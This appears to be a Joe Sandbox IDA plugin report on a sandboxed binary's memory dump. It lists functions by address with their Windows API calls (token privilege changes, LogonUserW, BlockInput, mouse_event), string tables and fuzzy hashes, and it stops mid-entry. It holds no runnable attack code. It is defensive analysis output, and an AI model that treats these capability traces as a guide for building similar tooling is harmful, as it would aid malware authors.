Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 0a5da176b6a507d8fbe0cd4ccb683e10bb552100249080f25109fa54550bc294
Instruction ID: 34f488654ded55045f0372283f9e53277f5bfae094f16930636593052ab828a2
Opcode Fuzzy Hash: 0a5da176b6a507d8fbe0cd4ccb683e10bb552100249080f25109fa54550bc294
Instruction Fuzzy Hash: D0118E366106109FD710EF29D849A2EF7E9FF85321F00855EF9A9D72A1DB70AC01CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00C2A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00C3977D,?,00C4FB84,?), ref: 00C2A302
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00C3977D,?,00C4FB84,?), ref: 00C2A314

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 597cf449fd408426466ba96cad43f5b3b541d9159b6d02ab041b4856749bf38d
Instruction ID: f3e22aecb70bc20ae8cd6c75270a1d07df1d4d4b509964ec78eb83f996700e89
Opcode Fuzzy Hash: 597cf449fd408426466ba96cad43f5b3b541d9159b6d02ab041b4856749bf38d
Instruction Fuzzy Hash: D8F0E23514422DEBDB209FA4CC48FEA73ACBF09361F0042A9B908D3191DA30D904CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C18713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C18851), ref: 00C18728
CloseHandle.KERNEL32(?,?,00C18851), ref: 00C1873A

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 3251436bb1a8b003e5ee0cfde6a8a903946054dffdfd24b606f9a54c66bb39c4
Instruction ID: 811f76a98c7294c1375e13df75e7bcd7242e108af6cd0eebc3c61df4e71548d5
Opcode Fuzzy Hash: 3251436bb1a8b003e5ee0cfde6a8a903946054dffdfd24b606f9a54c66bb39c4
Instruction Fuzzy Hash: FAE04636000640EEE7222B25EC08E77BBE9FB00360720882DB89680871CB72ACD1DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00BEA395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00BE8F97,?,?,?,00000001), ref: 00BEA39A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00BEA3A3

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 45a34bd18eddb4fac42f012e061776d7a6bba721e9161c629bec240714128dd4
Instruction ID: 04ac208ba357b859e73ff42278c449a4342b67131382388673fcd02461c19c71
Opcode Fuzzy Hash: 45a34bd18eddb4fac42f012e061776d7a6bba721e9161c629bec240714128dd4
Instruction Fuzzy Hash: F1B09235054208ABCA002F91EC09F8C3F68FB46AA2F404024F60D84070CB6254528A91

Uniqueness

Uniqueness Score: -1.00%

Function 00BEF419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51635e5fe44647a4fee297a83141774c18c9629fdb83330a46eb111c402348ab
Instruction ID: 3daa82ab5ac9c48ec581423c482ca3e805e9f2e9767df00fe34bb47bc41268da
Opcode Fuzzy Hash: 51635e5fe44647a4fee297a83141774c18c9629fdb83330a46eb111c402348ab
Instruction Fuzzy Hash: C6322525D69F424DD7239635D832339A289EFB73C5F25D737E81AB5AA6EB28C4C34100

Uniqueness

Uniqueness Score: -1.00%

Function 00BF267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 019b39047840328a2163debab5ae92ba50136efa9ff5af6910ceacd2b4cc8b29
Instruction ID: 6cc15d27e5212e48e8238aa89981d3ca8c1dba743b1d474193646eec6a685df5
Opcode Fuzzy Hash: 019b39047840328a2163debab5ae92ba50136efa9ff5af6910ceacd2b4cc8b29
Instruction Fuzzy Hash: FDB1D224D2AF414DD723963A883133ABA9CAFBB6DAF51D71BFC1674D22EB2185C34141

Uniqueness

Uniqueness Score: -1.00%

Function 00C28B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00C28B25

Part of subcall function 00BE543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00C291F8,00000000,?,?,?,?,00C293A9,00000000,?), ref: 00BE5443
Part of subcall function 00BE543A: __aulldiv.LIBCMT ref: 00BE5463

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: ff6febdcaebb1b704febdb0aa0cfaf6ad9b3975de705d02bf32d515554311c01
Instruction ID: 5e40f74856a011b3df1a2870f56afda07cbaa38870a5e489bf632bfa690cc438
Opcode Fuzzy Hash: ff6febdcaebb1b704febdb0aa0cfaf6ad9b3975de705d02bf32d515554311c01
Instruction Fuzzy Hash: 3521D2726255108BC729CF29D841B52B3E1EBA5311B288F6CD0F5CB6D0DA74B905CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00C341FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00C34218

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: b8cf2c9522ad11bde52bc038ab1c134a326716953218a35d1385014e83304daf
Instruction ID: 9f19aa587807f77252a1ae7880b062a10d659345ef0e5d07c45221e52f845ea9
Opcode Fuzzy Hash: b8cf2c9522ad11bde52bc038ab1c134a326716953218a35d1385014e83304daf
Instruction Fuzzy Hash: D7E01A352502149FD710AF5AD845F9BB7E8AF94760F01806AFC49D7262DA71A8418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C24EC9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00C24EEC

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: dbba0e0b6fd55c004d981a1c4146a6471748a66b114ba888bc126351d01f4786
Instruction ID: 3b82741134b29d1b1ebc226635f13cdc6bb665332e0d2b41dbcc8ed31ce80e27
Opcode Fuzzy Hash: dbba0e0b6fd55c004d981a1c4146a6471748a66b114ba888bc126351d01f4786
Instruction Fuzzy Hash: 95D05EAC260624BBFC1C4B24BC5FF778108F304791FD2418AB112898C1D8D06D516430

Uniqueness

Uniqueness Score: -1.00%

Function 00C18C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00C188D1), ref: 00C18CB3

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 5d13ef961428fad85332d44db11afe03f79775323aa8270d6b8fea5d70927550
Instruction ID: 396764f437392f9429ce73bf058ffa8c141abeb6650cb8e73f3ad023a3b50a2c
Opcode Fuzzy Hash: 5d13ef961428fad85332d44db11afe03f79775323aa8270d6b8fea5d70927550
Instruction Fuzzy Hash: 33D05E3226050EABEF018EA4DC01EAF3B69EB04B01F408111FE15C50A1C775D835AB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C02230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00C02242

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 9609fdde742542bff089713da7825d63f0ec327ffcc9452a2615da11deaddbaf
Instruction ID: 6dd610adb65738c92660f3e55e06252f05d36fab31b8ee69b7aa9039a171435e
Opcode Fuzzy Hash: 9609fdde742542bff089713da7825d63f0ec327ffcc9452a2615da11deaddbaf
Instruction Fuzzy Hash: 57C048F5C00109DBDB15DBA0DA88EEEBBFCBB08304F2440AAA502F2140E7749B44CA71

Uniqueness

Uniqueness Score: -1.00%

Function 00BEA364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00BEA36A

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 39ecefa22fd26945303de5e65f9593f05f75a2a374e5fec9d544b83b10c9c93a
Instruction ID: 27a0fab0cc3d293221672f9a87339bfaf10f7f98e80291caed329aca23331d3d
Opcode Fuzzy Hash: 39ecefa22fd26945303de5e65f9593f05f75a2a374e5fec9d544b83b10c9c93a
Instruction Fuzzy Hash: D3A0113000020CAB8A002F82EC08A88BFACEA02AA0B008020F80C800328B32A8228A80

Uniqueness

Uniqueness Score: -1.00%

Function 00BD8A0E Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cde1f13a8b4ab83088778bc7726ce56ac948f35bec770048488f3e0ae2e4bb3a
Instruction ID: 3ab2bce2303fb99884cda412606b46615e64d433049ad7b2bd04218f6584bada
Opcode Fuzzy Hash: cde1f13a8b4ab83088778bc7726ce56ac948f35bec770048488f3e0ae2e4bb3a
Instruction Fuzzy Hash: B1221630511616CBDF388B29C4C46BDF7E1EB82345F6885ABD8569B391EB309DC1DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BE2405 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 308838604d3bac47df79904c180b50aad3699f5b92f75baa1b8b356f6ba15685
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 44C160322051D309DB2D473F947413EBAE59EA27B132A0B9DE4B3CB5C4EF24D964E660

Uniqueness

Uniqueness Score: -1.00%

Function 00BE283A Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 4b6796cda56ea723d1156307c7a6a250042f587330e6782d188c31b201f84ecb
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 26C1B1322051D309DB2D473FC47403EBBE59AA27B132A1BEDE4B2CB5C5EF24D564A660

Uniqueness

Uniqueness Score: -1.00%

Function 00BE1BB8 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 6961036f5ec5d929c77a4afbfdcece1375daee282fcf533485f1918f406fdf1b
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 9DC16E322051D309DB2D463F947413EBAE1DAA27B132A0FEDE4B2CB5D4EF34D56496A0

Uniqueness

Uniqueness Score: -1.00%

Function 00C4A849 Relevance: 59.8, APIs: 33, Strings: 1, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00C4A89F
GetSysColorBrush.USER32(0000000F), ref: 00C4A8D0
GetSysColor.USER32(0000000F), ref: 00C4A8DC
SetBkColor.GDI32(?,000000FF), ref: 00C4A8F6
SelectObject.GDI32(?,?), ref: 00C4A905
InflateRect.USER32(?,000000FF,000000FF), ref: 00C4A930
GetSysColor.USER32(00000010), ref: 00C4A938
CreateSolidBrush.GDI32(00000000), ref: 00C4A93F
FrameRect.USER32(?,?,00000000), ref: 00C4A94E
DeleteObject.GDI32(00000000), ref: 00C4A955
InflateRect.USER32(?,000000FE,000000FE), ref: 00C4A9A0
FillRect.USER32(?,?,?), ref: 00C4A9D2
GetWindowLongW.USER32(?,000000F0), ref: 00C4A9FD

Part of subcall function 00C4AB60: GetSysColor.USER32(00000012), ref: 00C4AB99
Part of subcall function 00C4AB60: SetTextColor.GDI32(?,?), ref: 00C4AB9D
Part of subcall function 00C4AB60: GetSysColorBrush.USER32(0000000F), ref: 00C4ABB3
Part of subcall function 00C4AB60: GetSysColor.USER32(0000000F), ref: 00C4ABBE
Part of subcall function 00C4AB60: GetSysColor.USER32(00000011), ref: 00C4ABDB
Part of subcall function 00C4AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C4ABE9
Part of subcall function 00C4AB60: SelectObject.GDI32(?,00000000), ref: 00C4ABFA
Part of subcall function 00C4AB60: SetBkColor.GDI32(?,00000000), ref: 00C4AC03
Part of subcall function 00C4AB60: SelectObject.GDI32(?,?), ref: 00C4AC10
Part of subcall function 00C4AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00C4AC2F
Part of subcall function 00C4AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C4AC46
Part of subcall function 00C4AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00C4AC5B

Strings

@U=u, xrefs: 00C4AA4E

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID: @U=u
API String ID: 4124339563-2594219639
Opcode ID: 104138de06119ab98e8ee9761415e69f5897455f1edb4caf546abf76ec36e9d2
Instruction ID: c6aa362fa46d8dd6f73446e672cfd50c78be0a57cc34afdf2e4b2be03eb3101b
Opcode Fuzzy Hash: 104138de06119ab98e8ee9761415e69f5897455f1edb4caf546abf76ec36e9d2
Instruction Fuzzy Hash: CDA16976008301AFD7109F64DC08B6FBBA9FB8A321F104A2DF9A2961E1D775D946CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00C437F3 Relevance: 52.9, APIs: 6, Strings: 24, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00C4F910), ref: 00C438AF
IsWindowVisible.USER32(?), ref: 00C438D3

Strings

SETCURRENTSELECTION, xrefs: 00C43A3E
FINDSTRING, xrefs: 00C439FE
EDITPASTE, xrefs: 00C43BE7
ISCHECKED, xrefs: 00C43AC1
GETCURRENTSELECTION, xrefs: 00C43A6B
GETCURRENTLINE, xrefs: 00C43B75
ISVISIBLE, xrefs: 00C438BF
HIDEDROPDOWN, xrefs: 00C43988
@U=u, xrefs: 00C43B6B, 00C43B92, 00C43C1B
GETCURRENTCOL, xrefs: 00C43BB0
GETLINECOUNT, xrefs: 00C43B4E
ADDSTRING, xrefs: 00C4399E
CHECK, xrefs: 00C43AF5
TABLEFT, xrefs: 00C4390F
UNCHECK, xrefs: 00C43B0B
CURRENTTAB, xrefs: 00C43945
SHOWDROPDOWN, xrefs: 00C43968
SELECTSTRING, xrefs: 00C43A8E
SENDCOMMANDID, xrefs: 00C43C62
TABRIGHT, xrefs: 00C43925
GETSELECTED, xrefs: 00C43B2B
ISENABLED, xrefs: 00C438F3
GETLINE, xrefs: 00C43C23
DELSTRING, xrefs: 00C439D1

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: @U=u$ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-3469695742
Opcode ID: ab63c6280f04563b725c612bd0115c08e7a5ac054165622734b03d4fe4e8dc02
Instruction ID: adb47f3800d45ef36ffe7a12c63eb8a1b00210ae34a71a69f68481a5e0ffbd14
Opcode Fuzzy Hash: ab63c6280f04563b725c612bd0115c08e7a5ac054165622734b03d4fe4e8dc02
